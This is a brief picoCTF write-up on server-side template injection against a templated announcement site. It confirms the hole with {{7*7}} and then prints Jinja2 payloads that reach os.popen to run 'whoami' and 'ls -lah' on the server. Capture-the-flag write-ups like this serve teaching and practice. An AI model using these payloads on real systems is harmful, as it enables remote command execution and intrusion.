Description
I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps!
If we type picoCTF, it would show this:
Let’s try some template injection, in this case we are going to use this {{7*7}}:
PayloadsAllTheThings/Server Side Template Injection
This time, we got 49 because 7 × 7 = 49. That means our injection works. Now, let’s try some more advanced injections.
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('whoami').read() }}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls -lah').read() }}
Now we can read the flag.